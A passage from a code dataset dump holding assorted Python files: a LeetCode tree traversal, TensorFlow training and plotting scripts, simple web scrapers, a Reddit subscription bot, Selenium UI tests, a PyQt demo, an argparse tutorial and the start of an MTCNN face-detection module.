root: TreeNode) -> List[List[int]]:\n        if not root:\n            return []\n        self.ans[0]=[root.val]\n        if root.left or root.right:\n            self.gogogo(root.left,root.right,1)\n        res=[x for x in self.ans if x!=[]]\n        for i in range(len(res)):\n            if i%2==1:\n                res[i]=list(reversed(res[i]))\n        return res\n    def gogogo(self,node1,node2,dep):\n        self.ans.append([])\n        if node1:\n            self.ans[dep].append(node1.val)\n            if node1.left or node1.right:\n                self.gogogo(node1.left,node1.right,dep+1)\n        if node2: \n            self.ans[dep].append(node2.val)\n            if node2.left or node2.right:\n                self.gogogo(node2.left,node2.right,dep+1)\n\n\n\n# @lc code=end\n\n","sub_path":"103.二叉树的锯齿形层次遍历.py","file_name":"103.二叉树的锯齿形层次遍历.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"319459285","text":"import tensorflow as tf\nimport numpy as np\nimport tf_ocr\nimport matplotlib.pyplot as plt\nimport csv\nimport re\n\ncross_title = ['times', 'gradient-0.05_cross', 'gradient-0.1_cross', 'gradient-0.2_cross', 'gradient-0.5_cross',\n               'gradient-0.8_cross', 'adam-1e-4_cross', 'adag-0.2_cross']\n\naccuracy_title = ['', 'times', 'gradient-0.05_accuracy', 'gradient-0.1_accuracy', 'gradient-0.2_accuracy',\n                  'gradient-0.5_accuracy', 'gradient-0.8_accuracy', 'adam-1e-4_accuracy', 
'adag-0.2_accuracy']\n\ntotal_title = cross_title + accuracy_title\n\ntrain_method_list = [tf.train.GradientDescentOptimizer,\n tf.train.GradientDescentOptimizer,\n tf.train.GradientDescentOptimizer,\n tf.train.GradientDescentOptimizer,\n tf.train.GradientDescentOptimizer,\n tf.train.AdamOptimizer,\n tf.train.AdagradOptimizer]\n\ntrain_step_list = [0.05, 0.1, 0.2, 0.5, 0.8, 1e-4, 0.2]\n\ncsv_name = './result/result.csv'\nresult_name = './result/result.txt'\nresult_fig = './result/result.jpg'\n\ndef init():\n with open(csv_name, 'w') as csv_file:\n writer = csv.DictWriter(csv_file, fieldnames=total_title)\n writer.writeheader()\n\n with open(result_name, 'w+') as f:\n for i in range(200):\n buf = 'times_' + str(i*50) + ',\\n'\n f.writelines(buf)\n f.close()\n\ndef save_result(cnt, cross, accuracy):\n global line\n global buf\n print(\"%d: \" %cnt)\n print(cross)\n print(accuracy)\n\n with open(result_name, 'r') as f:\n for line in f.readlines():\n if line.find('times_' + str(cnt)) >= 0:\n buf = line.rstrip() + str(cross) + ',' + str(accuracy) + ',\\n'\n break\n open(result_name, 'r+').write(re.sub(line, buf, open(result_name).read()))\n\ndef save_csv(result_path, result_csv):\n global line\n global cross_list\n global accuracy_list\n global total_list\n with open(result_path, 'r') as f:\n with open(csv_name, 'a+') as csv_file:\n csv_writer = csv.writer(csv_file, delimiter=',')\n for line in f.readlines():\n accuracy_list = []\n cross_list = []\n total_list = line.split(',')\n cross_list.append(total_list[0])\n for i, value in enumerate(total_list):\n if i%2 == 0:\n accuracy_list.append(value)\n else:\n cross_list.append(value)\n cross_list[-1] = ''\n print(accuracy_list)\n print(cross_list)\n csv_writer.writerow(cross_list + accuracy_list)\n\ndef plot_result(result_csv, result_plot):\n # matlib plot function to display data input with output\n fig = plt.figure()\n # subplot(x, y, postion)\n ax = fig.add_subplot(1, 1, 1)\n\n ax.set_title('training cross')\n plt.xlabel('times')\n plt.ylabel('cross')\n\n global x\n global y_list\n global line_list\n\n line_list = ['r-', 'r:', 'b-', 'b:', 'g-', 'g:', 'y-']\n y_list = np.zeros((7, 200))\n x = np.linspace(0, 10000, 200)\n for i in range(7):\n with open(result_csv,'r') as csvfile:\n reader = csv.DictReader(csvfile)\n column = [row[cross_title[i+1]] for row in reader]\n y_list[i] = np.array(column)\n ax.plot(x, y_list[i], line_list[i], lw=1, label=cross_title[i+1])\n\n #loc = location\n plt.legend(loc=1, fontsize=\"small\")\n #plt.ioff()\n #show graphic\n #plt.show()\n plt.savefig(result_plot)\n\n\n\n\nif __name__ == '__main__':\n init()\n for i in range(7):\n tf_ocr.tf_ocr_train(train_method_list[i], train_step_list[i], save_result, method='train')\n save_csv(result_name, csv_name)\n plot_result(csv_name, result_fig)","sub_path":"tf4_ocr_nn/tf_ocr_io.py","file_name":"tf_ocr_io.py","file_ext":"py","file_size_in_byte":3825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"341505635","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Sep 6 21:52:44 2019\r\n\r\n@author: lison\r\n\"\"\"\r\n\r\nimport re\r\n\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nfrom lxml import html\r\n\r\ngetid = re.compile(r'\\d+')\r\nids = []\r\nurl_main = \"http://www.rotomato.com/sort/newmovie/page/\"\r\nurl_page = \"http://www.rotomato.com/archives/\"\r\ndef get_ids(url):\r\n for i in range(1,10):\r\n url_newmovie = url + str(i)\r\n con = requests.get(url_newmovie).content\r\n sel = 
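plot_result in the record above pulls one metric column per curve out of the results csv with csv.DictReader; a minimal standalone version of that lookup (column name taken from cross_title, and it assumes the column is fully populated):

import csv

with open('./result/result.csv') as f:
    column = [float(row['gradient-0.1_cross']) for row in csv.DictReader(f)]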
html.fromstring(con)\r\n infos = sel.xpath('//article')\r\n for movie in infos:\r\n id = movie.xpath('@id')\r\n #titles = movie.xpath('a/@title')\r\n ids.append(str(id)[7:11])\r\n\r\ndef get_movies(_ids):\r\n k=1\r\n for _id in _ids:\r\n url_movie = url_page+_id\r\n con = requests.get(url_movie).content\r\n sel = html.fromstring(con)\r\n title = sel.xpath('//meta[@property=\"og:description\"]/@content')\r\n code = sel.xpath('//code/a/@href')\r\n with open(\"rotomato.txt\",'a',encoding=\"utf-8\") as f:\r\n f.write(str(k)+\" : \"+'*'*60+\"\\n\"+title[0]+\"\\n\"+\"下载链接:\"+code[0]+\"\\n\")\r\n k=k+1\r\n\r\nif __name__==\"__main__\":\r\n get_ids(url_main)\r\n get_movies(ids)\r\n","sub_path":"爬虫/pa_5_rotomato.py","file_name":"pa_5_rotomato.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"27385248","text":"from policy_model import PolicyModel\nimport tensorflow as tf\nimport numpy as np\nimport os\nimport gym\nimport argparse\nimport pickle\n\n\n#Parse arguments\n#----------------------------\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--env\", default=\"BipedalWalker-v2\")\nparser.add_argument(\"--render\", action=\"store_true\")\nparser.add_argument(\"--unwrap\", action=\"store_true\")\nargs = parser.parse_args()\n\n\n#Parameters\n#----------------------------\nenv_id = args.env\nis_render = args.render\nsave_dir = \"./save_\" + env_id\nn_episode = 1000\n\n\n#Create the environment\n#----------------------------\nenv = gym.make(env_id)\nif args.unwrap: env = env.unwrapped\na_dim = env.action_space.shape[0]\na_low = env.action_space.low[0]\na_high = env.action_space.high[0]\ns_dim = env.observation_space.shape[0]\n\n\n#Create the model\n#----------------------------\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth = True\nsess = tf.Session(config=config)\npolicy = PolicyModel(sess, s_dim, a_dim, a_low, a_high)\n\n\n#Start playing\n#----------------------------\nsess.run(tf.global_variables_initializer())\nlogstd = np.zeros((1, a_dim), dtype=np.float32)\nlogstd.fill(-4.0)\n\n#Load the model\nsaver = tf.train.Saver(max_to_keep=2)\nckpt = tf.train.get_checkpoint_state(save_dir)\nif ckpt:\n\tprint(\"Loading the model ... \", end=\"\")\n\tsaver.restore(sess, ckpt.model_checkpoint_path)\n\tprint(\"Done.\")\n\ntraj = []\n\nfor i in range(n_episode):\n\tob = env.reset()\n\ttotal_reward = 0\n\ttraj.append([])\n\n\twhile True:\n\t\tif is_render: env.render()\n\t\taction = policy.action_step(np.expand_dims(ob.__array__(), axis=0), logstd)\n\t\ttraj[i].append(np.hstack([ob, action[0]]))\n\n\t\tob, reward, done, info = env.step(action[0])\n\t\ttotal_reward += reward\n\n\t\tif done:\n\t\t\tprint(\"Episode {:d}\".format(i))\n\t\t\tprint(\"----------------------------\")\n\t\t\tprint(\"total_reward = {:.4f}\".format(total_reward))\n\t\t\tprint(\"Episode length = {:d}\".format(len(traj[i])))\n\t\t\tprint()\n\t\t\tbreak\n\nprint(\"Saving the trajectories ... 
\", end=\"\")\npickle.dump(traj, open(os.path.join(save_dir, \"traj.pkl\"), \"wb\"))\nprint(\"Done.\")","sub_path":"tf/ppo/conti/sample_traj.py","file_name":"sample_traj.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"505497784","text":"\"\"\"\r\nUtilities for game\r\nDate: 02-02-2021\r\n\"\"\"\r\nfrom item import *\r\n\r\ndef loadChoices(filename):\r\n \"\"\"load choices data from file, return list of choice objs\"\"\"\r\n inf = open(filename,\"r\")\r\n lines = inf.readlines()\r\n inf.close()\r\n choices = []\r\n for line in lines:\r\n scenario,consequence,exp,cfoot,consq_alt,exp_alt,cfoot_alt,tag,ptag = line.strip().split(\";\")\r\n c = Item(scenario, consequence, int(exp), int(cfoot), consq_alt, int(exp_alt), int(cfoot_alt), tag, ptag)\r\n choices.append(c)\r\n return choices\r\n\r\ndef menu(opts):\r\n \"\"\"display menu, given a list, make sure we get valid menu input\"\"\"\r\n for i in range(len(opts)):\r\n print(\"%2d. %s\" % (i+1,opts[i]))\r\n min = 1\r\n max = len(opts)\r\n while True:\r\n pick = getInt(\"Your choice? \")\r\n if pick >= min and pick <= max:\r\n return pick\r\n else:\r\n print(\"please enter a valid choice!!!\")\r\n\r\ndef getInt(prompt):\r\n \"\"\"get a positive integer\"\"\"\r\n n = input(prompt)\r\n if n.isdigit():\r\n return int(n)\r\n else:\r\n return getInt(prompt)","sub_path":"codebase/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"559646338","text":"from webapp import db\n\nclass CRUDMixin(object):\n __table_args__ = {'extend_existing': True}\n\n id = db.Column(db.Integer, primary_key=True)\n\n # keep a list of properties that have changed, so we know if\n # something needs to be synced to the OpenStack cluster or to\n # the pool when save is called\n _changed_properties = set()\n\n @classmethod\n def get(cls):\n return db.session.query(cls).first()\n \n @classmethod \n def get_all(cls):\n return cls.query.all()\n \n @classmethod\n def get_by_id(cls, id):\n if any(\n (isinstance(id, basestring) and id.isdigit(),\n isinstance(id, (int, float))),\n ):\n return cls.query.get(int(id))\n return None\n\n @classmethod\n def create(cls, **kwargs):\n instance = cls(**kwargs)\n return instance.save()\n\n def __setattr__(self, key, value):\n # only if value is different from what's currently set\n if getattr(self, key, None) != value:\n # remember properties that are being changed\n self._changed_properties.add(key)\n super(CRUDMixin, self).__setattr__(key, value)\n\n # hooks that should be called when properties are being updated,\n # by default there are none, this is supposed to be overriden\n def _get_sync_hooks(self):\n return {}\n\n # check for properties that have hooks to sync on change and call hooks\n def call_property_hooks(self):\n hooks = self._get_sync_hooks()\n properties = self._changed_properties.copy()\n for prop in properties:\n if prop in hooks.keys():\n # call sync hook for changed property\n hooks[prop]()\n\n def update(self, commit=True, **kwargs):\n for attr, value in kwargs.iteritems():\n setattr(self, attr, value)\n return commit and self.save() or self\n\n def save(self, commit=True, ignore_hooks=False):\n db.session.add(self)\n if commit:\n if not ignore_hooks:\n self.call_property_hooks()\n # reset the _changed_properties if syncing has been completed\n self._changed_properties = set()\n db.session.commit()\n 
return self\n\n def delete(self, commit=True):\n db.session.delete(self)\n return commit and db.session.commit()\n","sub_path":"webapp/models/mixins.py","file_name":"mixins.py","file_ext":"py","file_size_in_byte":2279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"104269224","text":"#_*_ coding:utf-8 _*_\n__author__ = 'Lee'\nimport sys\nimport os\ncurrentUrl = os.path.dirname(__file__)\nparentUrl = os.path.abspath(os.path.join(currentUrl, os.pardir))\nsys.path.append(parentUrl)\nfrom selenium import webdriver\nimport unittest,time\nfrom Common.Common import CommonMethod\nfrom Common.Logger import Log\nclass Company(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n options = webdriver.ChromeOptions()\n options.binary_location = \"C:\\\\Users\\\\amallayev\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\"\n chrome_driver_binary = \"C:\\\\Python27\\\\chromedriver.exe\"\n cls.driver = webdriver.Chrome(chrome_driver_binary, chrome_options=options)\n\n @classmethod\n def tearDownClass(cls):\n cls.driver.quit()\n\n def setUp(self):\n self.imgs = []\n self.comme = CommonMethod()\n self.log = Log()\n\n def add_img(self):\n #截图添加到测试报告中的方法\n self.imgs.append(self.driver.get_screenshot_as_base64())\n return True\n\n def setup_get(self):\n self.driver.get(self.comme.url)\n self.driver.maximize_window()\n self.driver.find_element_by_class_name('apsClose').click()\n\n def wall_step(self,page,counts):\n \"\"\"\n :param page:验证第几页的logo墙\n :param counts:当前页有几个logo\n :return:logo墙测试方法,无返回值\n \"\"\"\n self.comme.roll('//div[@class=\"company-prefecture-two-content\"]/div[5]',self.driver)\n\n time.sleep(0.8)\n for i in range(1,counts+1):\n self.comme.hover('//div[@class=\"company-prefecture-three-div\"]/div/div[1]',self.driver)\n time.sleep(0.1)\n\n self.driver.find_element_by_xpath('//div[@class=\"company-prefecture-three-div-number\"]/div[%d]/div'%page).click()\n time.sleep(2)\n self.comme.hover('//div[@class=\"company-prefecture-three-div\"]/div/div[%d]'%i,self.driver)\n try:\n self.driver.find_element_by_xpath('//div[@class=\"company-prefecture-three-div\"]/div/div[%d]'%i).click()\n except Exception as e:\n self.log.error(e)\n self.driver.find_element_by_xpath('//div[@class=\"company-prefecture-three-div-number\"]/div[%d]/div'%page).click()\n time.sleep(1.8)\n self.driver.find_element_by_xpath('//div[@class=\"company-prefecture-three-div\"]/div/div[%d]'%i).click()\n time.sleep(1)\n self.add_img()\n self.driver.back()\n\n def test_company_1_ex(self):\n u\"\"\"金山云\"\"\"\n self.setup_get()\n time.sleep(1)\n self.comme.roll('//div[@class=\"company-prefecture-title\"]',self.driver)\n self.driver.find_element_by_xpath('//div[@class=\"company-prefecture-content-title-div\"]/div[2]/button').click()\n self.add_img()\n time.sleep(0.5)\n text1 = self.driver.find_element_by_xpath('//div[@class=\"company-read-info-content-content-title\"]/div/div').text\n self.assertIn(u'金山',text1)\n self.driver.back()\n\n def test_company_1_com(self):\n u\"\"\"金山云服务器,弹性IP,WPS+云办公\"\"\"\n self.setup_get()\n checklist=(u'服务器',u'弹性',u'云办公')\n for i in range(1,4):\n self.comme.roll('//div[@class=\"company-prefecture-title\"]',self.driver)\n self.driver.find_element_by_xpath('//div[@class=\"company-prefecture-content-title-div-middle\"]/div[%d]'%i).click()\n time.sleep(0.5)\n self.add_img()\n text2 = self.driver.find_element_by_xpath('//div[@class=\"product-item-title\"]/span').text\n self.assertIn(checklist[i-1],text2)\n\n self.driver.back()\n\n def 
test_company_2(self):\n        u\"\"\"微软,今目标,阿里云,腾讯云,华为云,绿盟,并行,云势\"\"\"\n        self.setup_get()\n        checklist=(u'微软',u'今目标',u'阿里云',u'腾讯云',u'华为云',u'绿盟',u'并行',u'云势')\n        self.comme.roll('//div[@class=\"company-prefecture-title\"]',self.driver)\n        for i in range(1,9):\n            self.driver.find_element_by_xpath('//div[@class=\"company-prefecture-two-content\"]/div[%d]'%i).click()\n            time.sleep(0.8)\n            self.add_img()\n            text1 = self.driver.find_element_by_xpath('//div[@class=\"company-read-info-content-content-title\"]/div/div').text\n            self.assertIn(checklist[i-1],text1)\n            self.driver.back()\n\n\n    def test_logowall(self):\n        u'''Logo wall'''\n        self.setup_get()\n\n        self.wall_step(1,15)\n\n        self.wall_step(2,15)\n\n        self.wall_step(3,7)\n\n\n    def test_company_contact_us(self):\n        u'''Company \"Contact us\" form'''\n        self.setup_get()\n        time.sleep(1)\n        self.comme.roll('//div[@class=\"company-prefecture-title\"]',self.driver)\n        self.driver.find_element_by_xpath('//div[@class=\"company-prefecture-content-title-div\"]/div[2]/button').click()\n        # click \"Contact us\"\n        time.sleep(1)\n        self.driver.find_element_by_xpath('//div[@class=\"company-read-info-content\"]/div[1]/div[3]/button').click()\n        # fill in the form fields and submit\n        self.comme.contact_us(u'厂商联系测试',u'厂商',u'15656567878',u'测试测试',self.driver,u'test@123.com')\n        time.sleep(1)\nif __name__ == '__main__':\n    unittest.main()","sub_path":"CloudHomePage/testCase/Company.py","file_name":"Company.py","file_ext":"py","file_size_in_byte":5338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"331378425","text":"import os\nimport sys\nimport subprocess\nimport re\nimport praw\nfrom tkinter import *\nfrom tkinter import ttk\nfrom tkinter import simpledialog\nimport tkinter.scrolledtext as tkst\nimport tkinter as tk\n\n#come back to add input for praw.ini file\nreddit = praw.Reddit('bot1')\nglobal commentids\nif not os.path.isfile('commentids.txt'):\n    commentids = []\n    open('commentids.txt', 'w+')\n    \nwith open('commentids.txt', 'r') as f:\n    commentids = f.read()\n    commentids = commentids.split('\\n')\n    commentids = list(filter(None, commentids))\n\nif not os.path.isfile(\"subscribers.txt\"):\n    subscribers = []\n    open(\"subscribers.txt\", \"w+\")\n\nwith open(\"subscribers.txt\", \"r\") as f:\n    subscribers = f.read()\n    subscribers = subscribers.split('\\n')\n    subscribers = list(filter(None, subscribers))\n    printed_subs = str(subscribers)\n    subscriber_number1 = len(subscribers)\n    subscriber_number2 = str(subscriber_number1)\n    \nclass chirper():\n    \n    def __init__(self, root):\n        global sub\n        if not os.path.isfile('sub.txt'): \n            f = open('sub.txt', 'w+') \n            root.withdraw()\n            sub = simpledialog.askstring(title='Subreddit Assignment',\n                                         prompt='Set a subreddit to scan:')\n            if sub == None:\n                root.deiconify() \n            elif sub != None:\n                f.write(sub)\n                print('New sub',\"'\", sub, \"'\", 'assigned successfully')\n                global v\n                v = StringVar()\n                v.set('Scanning subreddit: ' + sub)\n                root.deiconify()\n        else:\n            with open('sub.txt', 'r') as f:\n                sub = f.read()\n            v = StringVar()\n            v.set('Scanning subreddit: ' + sub)\n        \n        #tkinter master\n        frame = Frame(root)\n        frame.pack()\n        root.title(\"Reddit Chirper\")\n        self.exit = Button(frame, text='Exit', fg='red', command=root.destroy)\n        self.exit.grid(row=1, column=2)\n        \n        self.scan = Button(frame, text='Scan for new subscriptions and unsubscriptions', fg='black', command=self.scan)\n        self.scan.grid(row=0, column=1)\n        \n        Label(root, textvariable=v).pack()\n        \n        self.assign_sub = Button(frame, text='Assign a new subreddit', fg='black', command=self.assign_sub)\n        self.assign_sub.grid(row=0, 
column=2)\n \n self.send_message = Button(frame, text='Compose a message to your subscribers', fg='black', command=self.send_message)\n self.send_message.grid(row=1, column=1)\n \n textArea = tkst.ScrolledText()\n textArea.pack()\n textArea.insert(tk.INSERT,\n subscriber_number2 + ' subscribers: ' + printed_subs)\n \n #scans for new subscribers in assigned subreddit\n def scan(self):\n subreddit = reddit.subreddit(sub)\n for comment in reddit.subreddit(sub).comments():\n if comment.author.name not in subscribers and comment.id not in commentids and re.search(\"chirperadd!\", comment.body, re.IGNORECASE):\n comment.reply('You have been subscribed.')\n print(comment.author.name + ' subscribed.')\n subscribers.append(comment.author.name)\n with open (\"subscribers.txt\", \"w\") as f:\n for comment.author in subscribers:\n f.write(comment.author.name + \"\\n\")\n commentids.append(comment.id) \n with open ('commentids.txt', 'w')as f:\n for comment.id in commentids:\n f.write(comment.id + '\\n')\n \n elif comment.author.name in subscribers and comment.id not in commentids and re.search(\"chirperremove!\", comment.body, re.IGNORECASE):\n comment.reply(\"You have been unsubscribed.\")\n print(comment.author.name + ' unsubscribed.') \n commentids.append(comment.id)\n with open ('commentids.txt', 'w')as f:\n for comment.id in commentids:\n f.write(comment.id + '\\n')\n subscribers.remove(comment.author.name) #removes the comment author from the subscribers list to update tkinter 'show subscribers' output\n with open (\"subscribers.txt\", \"r+\") as f:\n lines = f.readlines()\n f.seek(0)\n for line in lines:\n if line == comment.author.name:\n f.write(\"\") \n \n def assign_sub(self):\n f = open('sub.txt', 'w+')\n root.withdraw()\n sub = simpledialog.askstring(title='Subreddit Assignment',\n prompt='Set a subreddit to scan:')\n if sub == None:\n root.deiconify() \n elif sub != None:\n f.write(sub)\n print('New sub',\"'\", sub, \"'\", 'assigned successfully')\n v = StringVar()\n v.set('Scanning subreddit: ' + sub)\n root.update_idletasks()\n root.deiconify()\n \n global Hermes \n def Hermes(self):\n print('placeholder function')\n \n def send_message(self):\n messenger = tk.Toplevel()\n messenger.title('Compose message')\n \n message_input = Text(messenger, bg='lightgrey')\n message_input.pack()\n \n self.send = Button(messenger, text='Send message', fg='black', command=lambda: [messenger.destroy(), Hermes(self)])\n self.send.pack()\n \nif __name__ == '__main__':\n root=tk.Tk()\n chirper(root)\n root.mainloop()\n","sub_path":"chirper.py","file_name":"chirper.py","file_ext":"py","file_size_in_byte":5721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"156098101","text":"#coding:utf-8\nimport urllib.request\nimport urllib.parse\nfrom bs4 import BeautifulSoup\nimport re\nimport os\n\ndef url_open(url):\n headers = {\"Referer\": \"http://www.netbian.com/s/lol/\",\n \"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36\"}\n req = urllib.request.Request(url,headers=headers)\n response = urllib.request.urlopen(req)\n html = response.read()\n\n return html\n\ndef find_imgs(url):\n html = url_open(url).decode(\"ANSI\")\n imgs_addrs = []\n regular = re.compile(r\"http://img\\.netbian\\.com/file/newc/[a-z0-9]+\\.jpg\")\n for each in regular.findall(html):\n imgs_addrs.append(each)\n print(\">>>imgs_addrs:\",imgs_addrs)\n\n return imgs_addrs\n\n\ndef save_imgs(folder,img_addrs):\n for 
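The scan() method above matches its subscribe/unsubscribe triggers case-insensitively; a quick standalone check of that pattern (sample comment bodies are made up):

import re

print(bool(re.search("chirperadd!", "ChirperAdd! thanks", re.IGNORECASE)))   # True
print(bool(re.search("chirperremove!", "no trigger here", re.IGNORECASE)))   # False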
each in img_addrs:\n filename = each.split(\"/\")[-1]\n with open(filename, 'wb') as f:\n img = url_open(each)\n f.write(img)\n\ndef download_Bizhi(folder=\"LOL壁纸\", pages=7):\n os.mkdir(folder)\n os.chdir(folder)\n\n url = \"http://www.netbian.com/s/lol/\"\n\n for i in range(1,pages):\n if i == 1:\n page_url = url + \"index.htm\"\n else:\n page_url = url + \"index_\" + str(i) + \".htm\"\n img_addrs = find_imgs(page_url)\n save_imgs(folder,img_addrs)\n\nif __name__ == \"__main__\":\n download_Bizhi()","sub_path":"spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"155843773","text":"\"\"\"\nsetAlignment(): 设置文本对齐\n\nsetIndent(): 设置文本缩进\n\ntext(): 获取文本内容\n\nsetBuddy(): 设置伙伴关系\n\nsetText(); 设置文本内容\n\nselectedText(): 返回所选择的字符\n\nsetWordWrap(): 设置是否运行换行\n\nlinkHovered :鼠标滑过\nlinkActivated: 鼠标点击\n\"\"\"\n\nimport sys\nfrom PyQt5 import QtWidgets, QtCore\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QToolTip, QWidget, QVBoxLayout, QLabel\nfrom PyQt5.QtGui import QIcon, QFont, QPalette, QPixmap\n\nclass QlableDemo(QWidget):\n def __init__(self):\n super().__init__()\n self.initUI()\n\n def initUI(self):\n label1 = QLabel(self)\n label2 = QLabel(self)\n label3 = QLabel(self)\n label4 = QLabel(self)\n label1.setText(\"这是一个文本编辑框\")\n label1.setAutoFillBackground(True)\n palette = QPalette()\n palette.setColor(QPalette.Window, Qt.blue)\n\n label1.setPalette(palette)\n label1.setAlignment(Qt.AlignCenter)\n label2.setText(\"欢迎使用Python GUI程序\")\n label3.setAlignment(Qt.AlignCenter)\n label3.setToolTip('图片标签')\n label3.setPixmap(QPixmap('F:\\Aphrodite\\picture\\disi第四印象 604期\\yoyo8.jpg'))\n label4.setOpenExternalLinks(False)\n label4.setText(\"漂不漂亮啊?\")\n label4.setAlignment(Qt.AlignRight)\n label4.setToolTip('超级连接')\n\n layout = QVBoxLayout()\n layout.addWidget(label1)\n layout.addWidget(label2)\n layout.addWidget(label3)\n layout.addWidget(label4)\n\n label2.linkHovered.connect(self.linkHovered)\n label4.linkActivated.connect(self.linkClicked)\n\n self.setLayout(layout)\n self.setWindowTitle('QLabel演示')\n self.setWindowIcon(QIcon('E:\\music\\down.ico'))\n def linkHovered(self):\n print('当鼠标滑过label2')\n\n def linkClicked(self):\n print('鼠标单击label4')\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n main = QlableDemo()\n main.show()\n sys.exit(app.exec_())","sub_path":"PyQtclass/class/lable_class.py","file_name":"lable_class.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"586726703","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n__author__ = 'MFC'\n__time__ = '2020-05-05 11:26'\n\n\"\"\"\nref:\nhttps://docs.python.org/zh-cn/3/library/argparse.html\nhttps://docs.python.org/zh-cn/3/howto/argparse.html\n\n\nrun in terminal:\n\npython argparse_demo.py -h \npython argparse_demo.py --help\npython argparse_demo.py foo \n\n在没有任何选项的情况下运行脚本不会在标准输出显示任何内容。这没有什么用处。\n\n第二行代码开始展现出 argparse 模块的作用。我们几乎什么也没有做,但已经得到一条很好的帮助信息。\n\n--help 选项,也可缩写为 -h,是唯一一个可以直接使用的选项(即不需要指定该选项的内容)。指定任何内容都会导致错误。即便如此,我们也能直接得到一条有用的用法信息。\n\"\"\"\n\nimport argparse\n\nparser = argparse.ArgumentParser()\n\n# 位置参数\n# parser.add_argument(\"echo\")\n\n# 增加位置参数的说明\nparser.add_argument(\"echo\", help=\"echo the args you use here\")\nparser.add_argument(\"square\", help=\"display a square of a given number\",type=int) # 指定类型\n\n# 
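find_imgs in the spider record above collects wallpaper URLs with a compiled regex; a standalone check of that regex against a made-up HTML snippet:

import re

regular = re.compile(r"http://img\.netbian\.com/file/newc/[a-z0-9]+\.jpg")
html = '<img src="http://img.netbian.com/file/newc/abc123.jpg">'
print(regular.findall(html))   # ['http://img.netbian.com/file/newc/abc123.jpg']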
Optional arguments\nparser.add_argument(\"--verbosity\", help=\"increase output verbosity\",action=\"store_true\")\n# A new keyword, action, is used here with the value \"store_true\". It means that when the option is present, args.verbosity is set to True; when it is omitted, the value implicitly defaults to False.\n# An optional argument that is not supplied (and has no store_true action) gets the value None\n\nargs = parser.parse_args()\n\nif args.verbosity:\n    print('verbosity turned on')\n\nprint(args.echo)\nprint(args.square**2)\n# running python argparse_demo.py foo 3 prints foo (and 9 for the square)\n\n\n# python argparse_demo.py test 3\n# python argparse_demo.py test 3 --verbosity x\n","sub_path":"python_official_doc/argparse_demo.py","file_name":"argparse_demo.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"37337492","text":"'''\n@Project: deep-learning-with-keras-notebooks\n@Package \n@author: ly\n@date Date: 2019-05-05 14:13\n@Description: \n@URL: https://github.com/ShyBigBoy/face-detection-mtcnn/blob/master/detect_face.py\n    https://zhuanlan.zhihu.com/p/58825924\n@version: V1.0\n'''\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom six import string_types, iteritems\n\nimport numpy as np\nimport tensorflow as tf\n\nimport cv2\nimport os\n\ndef layer( op ):\n    #Decorator for composable network layers.\n\n    def layer_decorated( self, *args, **kwargs ):\n        # Automatically set a name if not provided.\n        name = kwargs.setdefault( 'name', self.get_unique_name( op.__name__ ) )\n        # Figure out the layer inputs.\n        if len( self.terminals ) == 0:\n            raise RuntimeError( 'No input variables found for layer %s' % name )\n        elif len( self.terminals) == 1:\n            layer_input = self.terminals[0]\n        else:\n            layer_input = list( self.terminals )\n\n        # Perform the operation and get the output.\n        layer_output = op( self, layer_input, *args, **kwargs )\n        #Add to layer LUT\n        self.layers[name] = layer_output\n        # This output is now the input for the next layer\n        self.feed( layer_output )\n        return self\n\n    return layer_decorated\n\nclass Network( object ):\n\n    def __init__(self, inputs, trainable=True ):\n        # The input nodes for this network\n        self.inputs = inputs\n        # The current list of terminal nodes\n        self.terminals = []\n        # Mapping from layer names to layers\n        self.layers = dict( inputs )\n        # If true, the resulting variables are set as trainable\n        self.trainable = trainable\n\n        self.setup()\n\n    def setup(self ):\n        \"\"\"Construct the network. 
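The argparse record above is driven from the command line; parse_args also accepts an explicit argv list, which makes the same behaviour easy to exercise in-process (a small sketch mirroring the record's arguments):

import argparse

parser = argparse.ArgumentParser()
parser.add_argument("echo", help="echo the args you use here")
parser.add_argument("square", type=int)
parser.add_argument("--verbosity", action="store_true")

args = parser.parse_args(["test", "3", "--verbosity"])
print(args.echo, args.square ** 2, args.verbosity)   # test 9 True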
